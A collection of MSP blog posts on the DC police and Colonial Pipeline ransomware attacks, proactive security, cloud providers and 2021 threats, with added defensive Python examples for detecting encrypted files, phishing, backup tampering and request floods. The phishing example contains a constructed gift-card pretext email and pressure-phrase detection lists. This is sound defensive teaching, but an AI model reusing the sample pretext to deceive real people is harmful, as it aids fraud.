Ransomware, The DC Police & The Colonial Pipeline

Cyber attacks rose across the board between 2020 and 2021; this year alone has seen a reported 102% rise in ransomware attacks. This past week we have seen, and many of us have felt, two major ransomware attacks and their fallout. What was once something relegated to smaller businesses and institutions has become big business for criminal groups, with companies paying out millions of dollars to get their networks back in order and mitigate the damage.

WHAT IS RANSOMWARE

Ransomware is malware designed to make a company's or institution's data, and often its whole network, unusable until a monetary demand is paid. Think of it as digital kidnapping. Attackers use different methods to implant the malware and gain access to a system, typically phishing, stolen remote-access credentials or an unpatched internet-facing service. From there they encrypt the data it contains and lock out authorized users until the demanded ransom is paid. Oftentimes the malware is sold as a service from one criminal group to another, and the operators usually target businesses or data-reliant institutions such as schools and hospitals.

While sometimes, as with the 2017 WannaCry worm, the damage can be contained without paying (WannaCry was halted when a researcher registered the kill-switch domain its code checked before encrypting), there can still be consequences. In one case, a hospital dealing with a ransomware attack had to reroute an ambulance carrying a critical patient to another hospital over 20 miles away, and the patient died. At times these criminals will threaten to delete the data. Other times they will threaten to leak the data on both the clear and dark web, putting personal and proprietary information in jeopardy.

These attacks are proving more costly as time passes: the average ransom paid rose 171% in 2020 to over $300,000 per payment. The two most recent cases are also two of the most concerning, because they targeted critical infrastructure and law enforcement. These attacks have caused widespread panic in one case and, in the other, have put at risk the lives of those sworn to serve and protect.
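The lock-out side of ransomware leaves two traces on a host that a monitor can watch for: files whose contents suddenly look like random bytes, and files renamed with a ransom extension. The following is an added example, not code from the original post, that scores files on both signals; the entropy threshold, the suffix list and the sample files are constructed for illustration.

```python
"""Added example, not from the original post: a host-side check for the two
observable side effects of the ransomware behaviour described above, files
whose contents suddenly look like random bytes (high Shannon entropy) and
files renamed with a ransom extension. Sample files, threshold and extension
list are constructed for illustration."""
import math
import os
import tempfile
from collections import Counter
from pathlib import Path

# Bits of entropy per byte. Plain text sits around 4-5, compressed or
# encrypted data close to 8. Threshold and suffix list are assumptions.
ENTROPY_THRESHOLD = 7.2
SUSPICIOUS_SUFFIXES = {".locked", ".encrypted", ".crypt", ".enc"}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte over the byte histogram (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_file(path: Path, sample_bytes: int = 65536) -> dict:
    """Score one file from its first sample_bytes and its extension."""
    with open(path, "rb") as fh:
        head = fh.read(sample_bytes)
    entropy = shannon_entropy(head)
    suspicious_name = path.suffix.lower() in SUSPICIOUS_SUFFIXES
    return {
        "name": path.name,
        "entropy": round(entropy, 2),
        "suspicious_name": suspicious_name,
        "looks_encrypted": entropy >= ENTROPY_THRESHOLD or suspicious_name,
    }


def scan_tree(root: str) -> list:
    """Classify every regular file under root, most suspicious first."""
    records = [classify_file(p) for p in Path(root).rglob("*") if p.is_file()]
    return sorted(records, key=lambda r: (not r["looks_encrypted"], -r["entropy"]))


def flagged_names(root: str) -> set:
    """Names of files that look encrypted; the set a monitor would alert on."""
    return {r["name"] for r in scan_tree(root) if r["looks_encrypted"]}


def build_sample_tree() -> str:
    """Constructed sample data: two ordinary documents and two that ransomware has touched."""
    root = Path(tempfile.mkdtemp(prefix="ransom_demo_"))
    (root / "minutes.txt").write_text("Quarterly board minutes. " * 200)
    (root / "budget.csv").write_text("dept,amount\n" + "ops,1200\n" * 300)
    # Ciphertext is indistinguishable from random bytes, so os.urandom stands in for it.
    (root / "payroll.xlsx.locked").write_bytes(os.urandom(4096))   # renamed by the malware
    (root / "contracts.pdf").write_bytes(os.urandom(4096))         # encrypted in place
    return str(root)


if __name__ == "__main__":
    for rec in scan_tree(build_sample_tree()):
        flag = "ENCRYPTED?" if rec["looks_encrypted"] else "ok"
        print(f"{flag:10} {rec['entropy']:5.2f}  {rec['name']}")
```

Compressed formats (docx, xlsx, zip, jpeg) also score close to 8 bits per byte, so a production detector checks file magic before trusting entropy and alerts on the rate at which files change rather than on any single file; a canary file in every share, whose hash must never change, is a cheap complement.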

THE DC POLICE RANSOMWARE ATTACK

Early this week it was revealed that the Washington DC Metropolitan Police Department had been hit with a ransomware attack attributed to a Russian-speaking group. The attack occurred late last month, and the threat was simple: the attackers demanded $4 million in ransom to decrypt the files and withhold the data they had stolen. They were clear that if they were not paid they would begin to release sensitive data on officers, including background checks, full names and details of officers in the field including undercover officers, psychological evaluations, and disciplinary matters that had been brushed under the rug.

The attack was carried out by a group calling itself Babuk. While they are relative newcomers to the ransomware world, this isn't their first rodeo: Babuk made headlines earlier this year by claiming an attack on the Houston Rockets. The Rockets, a professional basketball team, reportedly had security controls that minimized the damage; the Washington DC police were far less equipped. Last week the department made its counteroffer of $100,000 in exchange for getting its data back. Babuk was not having any of that. In response they leaked troves of information: documents pertaining to hiring, including candidate interviews and reviews; the intelligence the police held on street gangs and other criminal organizations; and daily intelligence briefings meant for the police chief's eyes only. On top of that, dozens of officers' medical records, addresses and financial records were released as well.

While the ransom has not been paid, Babuk has gone a different, far more worrying route: the group announced it is retiring and will release its ransomware code so that any attacker can use it. Analysts disagree about the reason. Some say the code is faulty, with a decryptor that corrupts files whether the party demanding the ransom wanted them damaged or not, which makes the business untenable. Others say this "retirement" is because the group hit a high-profile target, became headline news, and left itself open to retaliation from law enforcement.

THE COLONIAL PIPELINE ATTACK

If you are reading this, I imagine you are familiar with the Colonial Pipeline attack. The internet has been flooded with memes and images of people filling bags with gasoline. Long lines, shortages and panic buying have been seen up and down the East Coast. The White House and President Biden had to publicly address it several times last week. What actually happened? Last week, attackers stole roughly 100 GB of internal data and encrypted systems on the company's business network in order to hold the operators of the Colonial Pipeline hostage. The pipeline, which carries fuel to much of the southeastern US, was shut down as a precaution to keep the ransomware from spreading from the business network into the systems that control the pipeline itself.

The ransomware was built by a group called DarkSide and sold to a secondary operator, known as an affiliate. This affiliate had a two-fold plan of attack: encrypt the data and threaten to release the stolen copy, similar to how the DC police attack played out. The fallout was nearly instantaneous. It caused the most widespread fuel shortage the region had seen in years, causing panic among customers and legitimate shortages across the southeastern US. The panic, however, spread along the East Coast. In fact, this writer personally witnessed three gas stations in PA that were without gas, not because of the pipeline, but because of panic buying.

DarkSide, the group who created the malicious software, specializes in what is known as Ransomware as a Service (RaaS). They are not the ones who carry out the attacks. They create the software, run the leak site and payment infrastructure, and even operate a help desk to aid in negotiations and in victims getting their data back, in exchange for a cut of each ransom. Even they were not expecting this fallout. They released a statement that in effect served as an apology, claiming they never intended for their product to be used to shut down infrastructure and that they would, in the future, better vet potential customers and add restrictions on what the software could be used against.

While initial reports said Colonial had not paid, it was later confirmed that the company paid about $4.4 million in Bitcoin (75 BTC) to the attackers within hours in order to obtain a decryption tool; that tool was reportedly so slow that the company restored largely from its own backups anyway. As of this writing, operations have restarted at the Colonial Pipeline, averting a long-term shortage. Ransomware is a problem that is not going away. However, these attacks have illustrated how we need to be prepared, both as citizens and as a nation, to protect ourselves from damaging attacks and from criminals who wish us harm for their own personal gain. In the wake of these attacks, the White House has announced an Industrial Control Systems Cybersecurity Initiative aimed at critical infrastructure operators.

It is now understood that these vulnerabilities must be recognized and addressed to ensure that this pipeline attack is not the tip of the iceberg. These attacks are widespread and can ruin their victims. Whether you are a local municipality, government agency, small business or major corporation, security should be a top concern. If you want to protect yourself from these attacks, stay on top of patching, require multi-factor authentication on every remote-access path, keep offline backups you have actually tested, and reach out to a security-minded MSP like Delval Technology Solutions.


How to Take a Proactive Approach to Cybersecurity

Each year the volume of cybersecurity threats continues to climb, with more than one billion malware programs in circulation and approximately 560,000 new pieces of malware detected each day. All the while, regulations such as the General Data Protection Regulation (GDPR) are constantly evolving. This means even a minor security breach can be devastating for your organization, leading to negative publicity, hefty fines and a loss of confidence in your brand.  

At Delval Technology Solutions, we can help you implement a proactive approach to cybersecurity that ensures your business is protected on all fronts in a dynamic, complex and ever-evolving threat landscape. This means understanding your organization, including its systems, applications and user base, identifying where vulnerabilities lie and addressing security risks before an attack ever occurs. This article will delve into how to do just that with a dedicated technology partner by your side.  

Identify and Evaluate Risks for Assets That Could Be Affected by Cyberattacks 

A proactive approach to cybersecurity is all about understanding, managing and mitigating risk to your company’s critical assets. The easiest way to accomplish this mission and ensure any shortfalls in your IT infrastructure are properly addressed is to conduct a comprehensive risk assessment. Here are a few basic steps to ensure a smooth risk assessment within your organization:  

  1. Identify and Prioritize Assets: Determine the scope of the assessment and decide which assets (data, systems, people, processes) attackers would most want to target and which the business cannot run without.  
  2. Identify Threats: A threat is anything that could cause harm to those assets, whether deliberate (ransomware, phishing, a malicious insider) or accidental (hardware failure, natural disasters, human error).  
  3. Identify Vulnerabilities: Identify the weaknesses, such as unpatched software, missing multi-factor authentication or over-broad access rights, that a threat could exploit to breach security, cause harm or steal data. 
  4. Analyze Controls: Document the controls already in place to reduce or eliminate each risk, classifying them as preventive (they stop an event, such as patching and MFA) or detective (they catch it early, such as log monitoring and EDR). 
  5. Calculate Likelihood and Impact: Estimate how likely each threat is to succeed given the current controls and how much damage it would do, and combine the two into a risk score. 
  6. Develop a Risk Assessment Report: Rank the risks by score and produce a report that supports management in deciding on cybersecurity budget, policies and procedures.  
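To make the six steps concrete, here is an added example (not part of the original article) of a minimal risk register that walks them on constructed data: assets, threats and vulnerabilities are paired up, preventive controls reduce likelihood, detective controls reduce impact, and the ranked output is what goes into the report. Every asset name, score and control effectiveness value is an illustrative assumption, not a measurement.

```python
"""Added example, not part of the original article: a minimal risk register that
walks the six steps above on constructed data. Assets, threats, scores and
control effectiveness values are illustrative assumptions, not measurements."""
from dataclasses import dataclass, field


@dataclass
class Control:
    name: str
    kind: str             # "preventive" lowers likelihood, "detective" lowers impact
    effectiveness: float  # 0.0-1.0 fraction of risk removed (assumed)


@dataclass
class Risk:
    asset: str            # step 1: what we are protecting
    asset_value: int      # impact if lost, 1 (minor) to 5 (critical)
    threat: str           # step 2
    vulnerability: str    # step 3: how the threat would get in
    likelihood: int       # step 5 input: 1 (rare) to 5 (almost certain), before controls
    controls: list = field(default_factory=list)   # step 4

    def residual(self) -> tuple:
        """Residual (likelihood, impact, score) after applying the listed controls."""
        lik, imp = float(self.likelihood), float(self.asset_value)
        for c in self.controls:
            if c.kind == "preventive":
                lik *= 1.0 - c.effectiveness
            elif c.kind == "detective":
                imp *= 1.0 - c.effectiveness
            else:
                raise ValueError(f"unknown control kind {c.kind!r}")
        lik, imp = max(lik, 1.0), max(imp, 1.0)   # no control drives a risk to zero
        return round(lik, 2), round(imp, 2), round(lik * imp, 2)


def rating(score: float) -> str:
    """Map a 1-25 score to the bands management reads (thresholds are assumed)."""
    if score >= 15:
        return "HIGH"
    if score >= 8:
        return "MEDIUM"
    return "LOW"


def build_register() -> list:
    """Constructed register for a small firm; every number here is an assumption."""
    patching = Control("30-day patch SLA on servers", "preventive", 0.25)
    mfa = Control("MFA on webmail and VPN", "preventive", 0.6)
    edr = Control("EDR with 24x7 monitoring", "detective", 0.3)
    backups = Control("Tested offline backups", "detective", 0.3)
    return [
        Risk("File server", 5, "ransomware", "SMB reachable by every VPN user", 5, [patching, edr, backups]),
        Risk("Email", 4, "credential phishing", "password-only webmail login", 5, [mfa]),
        Risk("Customer database", 5, "data theft", "no MFA on admin console", 3, []),
        Risk("Laptops", 2, "device loss", "disks not encrypted", 3, []),
    ]


def report(register: list) -> list:
    """Step 6: ranked rows for the risk assessment report, highest residual risk first."""
    rows = []
    for r in register:
        lik, imp, score = r.residual()
        rows.append({"asset": r.asset, "threat": r.threat, "likelihood": lik,
                     "impact": imp, "score": score, "rating": rating(score)})
    return sorted(rows, key=lambda row: row["score"], reverse=True)


if __name__ == "__main__":
    for row in report(build_register()):
        print(f"{row['rating']:6} {row['score']:5.2f}  {row['asset']}: {row['threat']}")
```

The point of the model is the ranking, not the decimals: the customer database with no controls outranks the file server that has three, which is exactly the conversation the report should start with management.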

Invest in Preventative Cybersecurity Measures 

Just like there is not one security product that can completely encompass all your organization’s vulnerabilities, there is not a single cybersecurity policy that can sufficiently address all the needs of your business. Instead, it’s time to invest in a multi-layered, integrated cybersecurity strategy that covers many core areas of cybersecurity, including network security, cloud security, application security, Internet of Things (IoT) security and more. To lay the foundation for a solid cybersecurity strategy, it’s important to do the following: 

  1. Understand the risks your organization faces on a daily basis. 
  2. Establish protective monitoring to detect and respond to these threats. 
  3. Prepare secure, tested data backups that keep your business running in the event of an attack. 
  4. Revisit your cybersecurity strategy as your organization changes and evolves over time. 

Never Underestimate the Power of Cybersecurity Training 

A proactive approach to cybersecurity begins with awareness. Lack of proper training leaves employees vulnerable to letting attackers into your organization, so investing in cybersecurity training can make the difference between the success and failure of your business. The responsibility lies with the employer to ensure employees have the knowledge they need to make the right decisions and know where to turn with questions about cybersecurity. To prioritize training, we recommend getting executive buy-in, starting early and repeating it often, and making the security health of your organization an ongoing team effort. 

Stop Relying on Reactive Cybersecurity Measures Alone to Protect Your Business 

If your company's current cybersecurity strategy is limited to firewalls, antivirus or anti-malware software, ad blockers and alerts that only fire once the tell-tale signs of a breach have appeared, there's a good chance you have a reactive strategy. Those tools matter, but on their own they are not enough to make a strong defense, because they wait for a known-bad pattern to show up. You need a combination of proactive measures (risk assessment, patching, least-privilege access, training) and reactive ones (monitoring, incident response, backups) to prevent data breaches and mitigate the ones that get through. For more cybersecurity solutions, including cloud security services, contact the experts at Delval Technology Solutions.  


AWS vs Local Cloud Providers: Who's Best for Your Business

It has been said that we live in an era of infinite choice. From the foods you eat, the shows you watch, to the goods you purchase, the possibilities are endless, and at times so is the confusion. Oftentimes our choice comes down to who is providing the service and where we are getting it from. Do we pick giant platforms backed up by industry titans like Hulu, Spotify and Whole Foods? Is supporting small businesses, such as buying from Etsy stores, watching independent films, and shopping at farmers markets, important to your decision making? It can be a lot to process, at times to the point of anxiety and frustration.

The cloud has gone from a novel place to upload your personal photos to a must-have for backing up your business data. It has been said that over 6 million hard drives fail each year, so not having an off-site backup is no longer an option. Choosing a cloud provider for your business is no different from any of these choices. Do you go with a multi-billion-dollar corporation such as Amazon, Microsoft or Google? Do you choose the personalized, localized approach of a company such as Delval Technology Solutions? It depends on you and what you are looking for. Today we are going to focus on the head-to-head between your local service provider and the monolith of business and consumerism that is Amazon.

WHAT IS AWS

AWS stands for Amazon Web Services. Amazon's pattern is that when it finds itself spending heavily on an outside service, it builds the capability in house and then sells it to others: after problems with shipping carriers it built its own delivery fleet, and after building the data centers and infrastructure needed to run its own retail operation, it launched AWS in 2006 to sell that computing capacity to everyone else. Using that global footprint of data centers, Amazon now offers cloud services to businesses of all sizes across the globe.

WHAT DOES AWS OFFER

AWS is known for its ease of use. Like Amazon's other services, it aims not to be too tech-heavy and to be approachable by businesses ranging from tech novices to experts. Following its parent company's playbook, AWS strives to be a one-stop shop, offering a wide catalogue of software, network and analytics tools and other products to bolster its cloud services. It also offers capacity that scales on demand, which makes growth much easier (though bandwidth is metered and billed, not unlimited), and a range of security services, with the caveat that how much of your data's protection they actually cover depends on how you configure them.

WHAT ARE THE ISSUES?

However, Amazon Web Services also has its drawbacks. One of the biggest is billing. As a business owner, when you get an invoice you want to know what you are paying for in an easily digestible way. It is frustrating to open an invoice and find charges for things you weren't using, obtuse descriptions of charges, or fees for add-ons you didn't know you had enabled. These are all complaints AWS customers have made about their bills.

In the past few years, data mining has gone from a relatively unknown industry term to part of the cultural lexicon, and most of the public's privacy concerns about big tech come down to it. Your data is the lifeblood of your business, and something you must protect for the sake of your company and your customers, so it is worth being precise about what a large provider does and does not do with it. AWS's customer agreement states that it does not use customer content for purposes other than providing its services, and content stays in the region you select unless you move it; what the provider does collect is account and usage metadata, which is also what its billing and analytics tooling is built on. The more important point is the shared responsibility model: AWS secures the underlying infrastructure, but encrypting your data, controlling who can access it, and deciding where it resides (including whether it is ever replicated to a region under another government's jurisdiction) are your job, and the default settings will not do it for you.

Another important thing to remember about AWS is the scale of the company. AWS has millions of active customers around the globe. While that is a good thing on some fronts, it also means the chances of dealing with someone who knows you, your business, and where your data actually lives are slim to none.

WHAT CAN A LOCAL CLOUD PROVIDER DO FOR YOU?

Think of your local cloud provider, such as Delval Technology Solutions, as your favorite family-owned store. While they may not have the same stock as a Wal-Mart or Amazon, they provide things these giant conglomerates can't. Your favorite deli remembers that you want hot peppers but hate pickles. The local hardware store owner helped you handcraft your new deck. Your favorite bartender? You don't even have to order; your drink is waiting as soon as you make eye contact. A local MSP is no different from any of these local businesses. When you build a relationship with them, they get to know you and you get to know them, personally. More importantly, they get to know your business. You aren't just a ticket number being forwarded to some far-away call center. You can walk into their office, shake their hand and talk about the tech issues that matter to your business. When it comes to advising you on your next steps, your local MSP does so with intimate knowledge of your business and your needs, something you can't get from a giant company.

A company like AWS has data centers all over the globe. While this has benefits in terms of operational scope, it has drawbacks as well, one of which is bringing new clients onto the cloud. Migrating to a gigantic cloud can take a new customer more time and more headaches than moving to a localized one. It's also a matter of comfort. After all, this is your network, the lifeblood of your business. AWS lets you pick a region, but not knowing precisely where your data sits or who can see it is a source of anxiety for many. With a local MSP such as Delval Technology Solutions, where your data is stored and who is watching it is transparent.

Chances are, you aren't a technology expert. You are, however, an expert in your field, trusted by your clients to handle their needs, whether legal, financial or otherwise. It's fair to say you want your cloud provider to be an expert as well. While a company such as AWS may have thousands of employees, you won't usually be talking to its experts; support at that scale is tiered, and complex problems with your network take time to reach someone who can solve them. A local cloud provider is different. They know their systems and, because of their hands-on approach, often have solutions for issues before you run into them.

Finally, and to many most importantly, is cost. Your local cloud service provider understands your budget and works to keep you inside of it while providing you the most “bang for your buck”. They can make sure you are only being charged for what you need, not things you may possibly need in the future.

When it comes to a cloud provider, there are many factors to take into account. What matters to you and your business can be many things. For some it's cost, for others it's comfort. Do your research, weigh the pros and cons. This will help your business live a long life and not die "death by infinite choice."


Threats To Look Out For in 2021

2020 and the Covid pandemic not only changed the way a lot of companies do business, it also changed the way attackers go after those businesses. Last year cyber attacks were reported to be up over 200 percent, and the trend shows no signs of letting up. More people are working from home, often on unsecured home Wi-Fi networks, to reach their company's cloud services. While many of the techniques attackers use have been seen before, their methods are getting more sophisticated. What follows are the biggest threats to look out for in 2021. Protect yourself from them with proper software and procedures, and with a security-minded MSP such as Delval Technology Solutions.

SOCIAL ENGINEERING

Social engineering attacks use your employees, and even you, to get into your network. The most notorious is phishing. Phishing attacks use misleading texts, emails and even phone calls to convince the recipient to take an action, which can range from typing your email and password into a look-alike login page that captures them, to downloading a file full of malware, to sending money to the culprit. They work because the emails and texts look like they come from legitimate sources for legitimate reasons. In 2020, phishing attacks reportedly rose by an astounding 600%.

An offshoot of this is spear phishing, a more targeted form that appears to come from trusted sources such as CEOs and HR departments. Pretexting has also been on the rise. Pretexting relies on both trust and empathy: the criminal poses as someone the victim knows, perhaps their boss calling to say he is stuck somewhere and needs help in the form of gift cards. While basic phishing is crude ("You have just won a million dollars"), pretexting is more complex, with a believable story and a rapport built up over several exchanges. Regardless of the method, a social engineer's goal is to get into your systems and walk away with valuable resources, such as money or data.
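The spoofed-boss and gift-card pretext described above leaves fingerprints in the message itself: an executive's display name on an outside domain, a Reply-To pointing somewhere else, a lookalike domain, a failed SPF/DMARC verdict, and pressure language in the body. The following added example (not code from the original article) checks for those signals over two constructed messages; the company domain, the executive list and the pressure-word list are illustrative assumptions to adapt to your own organization.

```python
"""Added example, not from the original article: header and body checks for
the phishing and pretexting patterns described above, run over two constructed
messages. The company domain, executive list and pressure-word list are
illustrative assumptions to adapt to your own organization."""
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

COMPANY_DOMAIN = "example.com"                    # assumed
EXECUTIVES = {"jane doe", "john smith"}           # assumed display names worth impersonating
PRESSURE_WORDS = ("urgent", "gift card", "wire transfer", "asap",
                  "confidential", "stuck in a meeting", "don't call")


def levenshtein(a: str, b: str) -> int:
    """Edit distance; a lookalike such as examp1e.com is one edit from example.com."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def analyze(raw: bytes) -> dict:
    """Return the reasons a message looks like social engineering; two or more is an alert."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    from_name, from_addr = parseaddr(str(msg.get("From", "")))
    _, reply_addr = parseaddr(str(msg.get("Reply-To", "")) or from_addr)
    from_domain = from_addr.rpartition("@")[2].lower()
    reply_domain = reply_addr.rpartition("@")[2].lower()
    reasons = []

    # Display-name spoofing: an executive's name on a free-mail or foreign domain.
    if from_domain != COMPANY_DOMAIN and from_name.strip().lower() in EXECUTIVES:
        reasons.append(f"display name '{from_name}' used from outside domain {from_domain}")
    # Lookalike domains in either the sender or the reply path.
    for dom in {from_domain, reply_domain}:
        if 0 < levenshtein(dom, COMPANY_DOMAIN) <= 2:
            reasons.append(f"{dom} is a lookalike of {COMPANY_DOMAIN}")
    # Replies silently redirected to a different mailbox.
    if reply_addr and reply_addr.lower() != from_addr.lower():
        reasons.append(f"Reply-To {reply_addr} differs from From {from_addr}")
    # Upstream SPF/DMARC verdicts recorded by the receiving mail server.
    auth = str(msg.get("Authentication-Results", "")).lower()
    if "dmarc=fail" in auth or "spf=fail" in auth:
        reasons.append("SPF or DMARC failure in Authentication-Results")
    # Pretexting language: urgency, secrecy, unusual payment methods.
    body = msg.get_body(preferencelist=("plain",))
    text = body.get_content().lower() if body else ""
    hits = [w for w in PRESSURE_WORDS if w in text]
    if len(hits) >= 2:
        reasons.append("pressure language: " + ", ".join(hits))

    return {"subject": str(msg.get("Subject", "")), "suspicious": len(reasons) >= 2, "reasons": reasons}


# Constructed messages: a gift-card pretext and a legitimate internal note.
PRETEXT = b"""From: Jane Doe <jane.doe@gmail.com>
Reply-To: ceo.office@examp1e.com
To: bob@example.com
Subject: quick favour
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=gmail.com; dmarc=none

Bob, I'm stuck in a meeting and need you to buy gift cards for a client ASAP.
Keep this confidential and just reply with the codes, don't call.
"""

LEGIT = b"""From: Jane Doe <jane.doe@example.com>
To: bob@example.com
Subject: Q3 budget review
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=example.com; dmarc=pass

Bob, please send the updated Q3 numbers before Friday's review. Thanks.
"""

if __name__ == "__main__":
    for raw in (PRETEXT, LEGIT):
        result = analyze(raw)
        print(result["subject"], "->", "SUSPICIOUS" if result["suspicious"] else "ok")
        for reason in result["reasons"]:
            print("   -", reason)
```

None of these checks is conclusive on its own (executives do use personal mail, and legitimate newsletters set Reply-To), which is why the verdict requires two independent signals; the Authentication-Results check only means something if your own mail server is the one stamping that header, since an attacker can forge it in the message they send.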

RANSOMWARE

Over the course of 2020 into 2021, ransomware attacks have soared. Many are familiar with the 2017 WannaCry attack that crippled large parts of the UK's National Health Service. Ransomware occurs when attackers get into a system, encrypt the data and hold it for ransom, locking authorized users out until the ransom is paid; increasingly they also steal a copy first and threaten to publish it. Most recently, the Washington DC Police Department was hit with a staggering ransomware attack: over 250 gigabytes of data, including personnel files, were held for ransom by the Babuk group. While many other attacks are prevalent, ransomware is perhaps the most concerning. There is no guarantee that if you pay the ransom you will get your data back. This is why tested, offline backups and encryption of sensitive files at rest are critical: the backups get you running again without paying, and encryption at rest limits what a stolen copy is worth, provided the keys do not sit on the same compromised system.
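A backup only counts as a control if you can prove it restores what you think it does. The following added example (not code from the original article) serves both the "proper backup protocols" point here and the "secure data backups" item in the proactive-security article above: it records a SHA-256 manifest of a healthy tree, shows how the manifest exposes files a ransomware run has overwritten, and confirms the backup copy still restores cleanly. All paths and file contents are constructed.

```python
"""Added example, not from the original article: a backup integrity check that
serves both the "proper backup protocols" point here and the "secure data backups"
item in the proactive-security article. It records a SHA-256 manifest of a healthy
tree, shows how the manifest exposes files a ransomware run has overwritten, and
proves the backup copy still restores cleanly. Paths and contents are constructed."""
import hashlib
import json
import os
import shutil
import tempfile
from pathlib import Path


def sha256_file(path: Path, chunk: int = 1 << 16) -> str:
    """Stream a file through SHA-256 so large files do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root) -> dict:
    """Relative path -> SHA-256 for every file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify(root, manifest: dict) -> dict:
    """Compare a tree against a stored manifest; all three lists empty means it matches."""
    current = build_manifest(root)
    return {
        "missing": sorted(set(manifest) - set(current)),
        "modified": sorted(k for k in manifest if k in current and current[k] != manifest[k]),
        "unexpected": sorted(set(current) - set(manifest)),
    }


def is_clean(result: dict) -> bool:
    return not any(result.values())


def demo():
    """Constructed scenario: snapshot, back up, get hit, check live tree and test a restore."""
    work = Path(tempfile.mkdtemp(prefix="backup_demo_"))
    live, backup, restore = work / "live", work / "backup", work / "restore"
    (live / "docs").mkdir(parents=True)
    (live / "docs" / "contract.txt").write_text("Signed agreement, 2021-05-10.\n")
    (live / "ledger.csv").write_text("date,amount\n2021-05-01,1200\n")

    manifest = build_manifest(live)                    # 1. record hashes while healthy
    shutil.copytree(live, backup)                      # 2. take the backup
    (work / "manifest.json").write_text(json.dumps(manifest, indent=2))

    # 3. ransomware hits the live tree: a file is overwritten with ciphertext, a note is dropped
    (live / "ledger.csv").write_bytes(os.urandom(64))
    (live / "README_RESTORE.txt").write_text("your files are encrypted\n")

    stored = json.loads((work / "manifest.json").read_text())
    live_result = verify(live, stored)                 # 4. what changed on the live host
    shutil.copytree(backup, restore)                   # 5. restore test into a clean location
    restore_result = verify(restore, stored)
    return live_result, restore_result


if __name__ == "__main__":
    live_result, restore_result = demo()
    print("live tree:", live_result)
    print("restore test:", "clean" if is_clean(restore_result) else restore_result)
```

The manifest and the backup copy must live somewhere the ransomware operator's credentials cannot reach (offline media, immutable object storage, or a separate account), because operators routinely delete or encrypt reachable backups before triggering the payload; and the restore step should run on a schedule, since an untested backup is a hope rather than a control.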

DDoS

DDoS stands for Distributed Denial of Service. While the acronym may seem confusing, the attacks are straightforward: a DDoS attack sends hundreds of thousands, if not millions, of requests and data packets from many machines at once, aiming to overwhelm a server or network link so that it can no longer do its job. These don't just take down e-commerce sites or email servers; they can saturate your entire internet connection and lock users out of everything behind it. One common ingredient is SNMP, the Simple Network Management Protocol, which runs on routers, switches and printers across your network: attackers send small spoofed queries to poorly configured SNMP devices, which answer with much larger replies aimed at the victim, amplifying the flood. Last year, Amazon Web Services reported mitigating a record-setting 2.3 terabit-per-second DDoS attack, a reminder that even a billion-dollar organization with high-end defenses is a target. School districts in Massachusetts and a university in Canada were also hit last year; both initially chalked it up to a network failure, only to discover later that attackers had taken the network down.
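The difference between "a network failure" and "we are being flooded" is usually visible in the request log long before the server stops answering. The following added example (not code from the original article) runs a sliding-window rate check over constructed web-server log lines and covers both the single noisy source and the distributed case where no individual address looks abnormal; thresholds, addresses and log lines are assumptions.

```python
"""Added example, not from the original article: a request-rate detector run over
constructed web-server log lines, the kind of check a monitoring system uses to
notice a flood before the server stops answering. Both the single-source and
the distributed case are covered. Thresholds, addresses and log lines are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined" log format prefix: client, identity, user, [timestamp], "request", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
WINDOW_SECONDS = 10
PER_IP_LIMIT = 20      # requests per window from one source before alerting (assumed)
GLOBAL_LIMIT = 100     # requests per window across all sources (assumed)


def parse_line(line: str):
    """Return {"ip", "ts", "req"} for a well-formed line, None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").timestamp()
    return {"ip": m.group("ip"), "ts": ts, "req": m.group("req")}


def _trim(q: deque, cutoff: float) -> None:
    """Drop timestamps that have fallen out of the sliding window."""
    while q and q[0] < cutoff:
        q.popleft()


def detect(lines) -> list:
    """Walk the log in order; one alert per offending source plus one for the aggregate."""
    per_ip = defaultdict(deque)
    everything = deque()
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        cutoff = rec["ts"] - WINDOW_SECONDS
        q = per_ip[rec["ip"]]
        q.append(rec["ts"])
        everything.append(rec["ts"])
        _trim(q, cutoff)
        _trim(everything, cutoff)
        if len(q) > PER_IP_LIMIT and rec["ip"] not in alerted:
            alerted.add(rec["ip"])
            alerts.append(f"source {rec['ip']} sent {len(q)} requests in {WINDOW_SECONDS}s")
        if len(everything) > GLOBAL_LIMIT and "*" not in alerted:
            alerted.add("*")
            alerts.append(f"aggregate rate exceeded {GLOBAL_LIMIT} requests in {WINDOW_SECONDS}s "
                          f"({len(per_ip)} distinct sources seen)")
    return alerts


def build_sample_log() -> list:
    """Constructed log: light background traffic, one noisy source, then a distributed flood."""
    base = datetime(2021, 5, 10, 14, 0, 0, tzinfo=timezone.utc)

    def line(ip, offset, path="/"):
        ts = (base + timedelta(seconds=offset)).strftime("%d/%b/%Y:%H:%M:%S %z")
        return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" 200 512'

    lines = [line(f"198.51.100.{i % 5 + 1}", i * 4) for i in range(15)]                    # t = 0..56
    lines += [line("203.0.113.7", 60 + i // 6, "/login") for i in range(30)]                # 30 hits in 5 s
    lines += [line(f"192.0.2.{i + 1}", 120 + i // 24, "/search?q=a") for i in range(120)]  # 120 hosts, one hit each
    lines.append("this line is not a log entry")
    return lines


if __name__ == "__main__":
    for alert in detect(build_sample_log()):
        print("ALERT:", alert)
```

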